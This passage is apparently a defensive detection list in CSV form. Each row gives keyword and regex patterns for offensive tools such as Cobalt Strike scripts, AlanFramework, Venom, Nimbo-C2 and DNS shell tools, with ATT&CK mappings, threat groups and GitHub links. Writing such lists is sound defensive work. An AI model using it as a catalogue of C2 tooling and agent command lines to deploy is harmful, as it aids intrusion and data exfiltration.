"*ag_load_script*",".{0,1000}ag_load_script.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*agent*DNSCommunication.cpp*",".{0,1000}agent.{0,1000}DNSCommunication\.cpp.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*agent.exe -dns -srvhost *",".{0,1000}agent\.exe\s\-dns\s\-srvhost\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - 
TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*agent.exe -lhost * -reuse-port *",".{0,1000}agent\.exe\s\-lhost\s.{0,1000}\s\-reuse\-port\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*agent/cmd_download_files.*",".{0,1000}agent\/cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_exec.*",".{0,1000}agent\/cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_kill.*",".{0,1000}agent\/cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_proxy.*",".{0,1000}agent\/cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team 
activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_run.c*",".{0,1000}agent\/cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_shell.*",".{0,1000}agent\/cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_sleep.*",".{0,1000}agent\/cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_sysinfo.c*",".{0,1000}agent\/cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" 
"*agent/cmd_upload_files.*",".{0,1000}agent\/cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/dll.nim*",".{0,1000}agent\/dll\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*agent/elf.nim*",".{0,1000}agent\/elf\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*agent/exe.nim*",".{0,1000}agent\/exe\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Agent/ratchatPT.go*",".{0,1000}Agent\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 
- T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*agent\cmd_download_files.*",".{0,1000}agent\\cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_exec.*",".{0,1000}agent\\cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_kill.*",".{0,1000}agent\\cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_proxy.*",".{0,1000}agent\\cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" 
"*agent\cmd_run.c*",".{0,1000}agent\\cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_shell.*",".{0,1000}agent\\cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_sleep.*",".{0,1000}agent\\cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_sysinfo.c*",".{0,1000}agent\\cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_upload_files.*",".{0,1000}agent\\cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - 
TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent_code/bash_executor*",".{0,1000}agent_code\/bash_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*agent_dll.dll*",".{0,1000}agent_dll\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent_linux_x64 -lport *",".{0,1000}agent_linux_x64\s\-lport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*agent_linux_x64 -rhost * -rport *",".{0,1000}agent_linux_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*agents/Follina-2*",".{0,1000}agents\/Follina\-2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*AggressiveProxy.cna*",".{0,1000}AggressiveProxy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*aggressor.beacons*",".{0,1000}aggressor\.beacons.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*aggressor.bshell*",".{0,1000}aggressor\.bshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
"*aggressor.cna*",".{0,1000}aggressor\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*aggressor.dialog*",".{0,1000}aggressor\.dialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*aggressor.println*",".{0,1000}aggressor\.println.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*aggressor.py*",".{0,1000}aggressor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*Aggressor/TikiTorch*",".{0,1000}Aggressor\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*AggressorScripts*",".{0,1000}AggressorScripts.{0,1000}","offensive_tool_keyword","AggressorScripts-1","Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1","1","1","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" "*aggressor-scripts*",".{0,1000}aggressor\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*Aggressor-Scripts*",".{0,1000}Aggressor\-Scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
